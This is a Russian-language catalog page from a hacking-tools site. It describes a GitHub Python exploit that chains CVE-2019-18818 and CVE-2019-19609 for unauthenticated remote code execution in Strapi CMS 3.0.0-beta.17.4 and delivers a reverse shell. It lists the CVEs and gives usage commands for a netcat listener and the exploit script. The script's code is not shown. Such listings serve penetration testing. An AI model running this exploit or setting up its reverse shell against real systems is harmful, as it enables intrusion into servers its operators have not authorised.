Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-19609 — Python-скрипт эксплойта, нацеленный на неаутентифицированное удаленное выполнение кода в Strapi CMS 3.0.0-beta.17.4 через CVE-2019-18818 и CVE-2019-19609, доставляющий обратную оболочку. | Kitploit
Инструменты/GitHubGitHub/glowbase/cve-2019-19609
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubglowbase/cve-2019-19609

CVE-2019-19609

Python-скрипт эксплойта, нацеленный на неаутентифицированное удаленное выполнение кода в Strapi CMS 3.0.0-beta.17.4 через CVE-2019-18818 и CVE-2019-19609, доставляющий обратную оболочку.

Репозиторий
2134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Strapi CMS

Этот эксплойт нацелен на две уязвимости в Strapi CMS Framework версии 3.0.0-beta-17.4, позволяющие выполнить удалённый код (RCE) без аутентификации.

 

Уязвимости

CVE-2019-18818

Слабый механизм восстановления пароля для забытого пароля

CVSS: 9.8 - Критический

Подробнее: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609

Некорректная нейтрализация специальных элементов в команде ОС («Внедрение команд ОС»)

CVSS: 7.2 - Высокий

Подробнее: https://nvd.nist.gov/vuln/detail/CVE-2019-19609

 

Использование:

Перед запуском этого эксплойта запустите netcat listener на порту lport, который вы укажете в параметрах ниже.

Запуск netcat listener

root@kitploit:~
nc -lnvp <lport>

Запуск эксплойта

root@kitploit:~
exploit.py <rhost> <lhost> <lport>
Скачать инструмент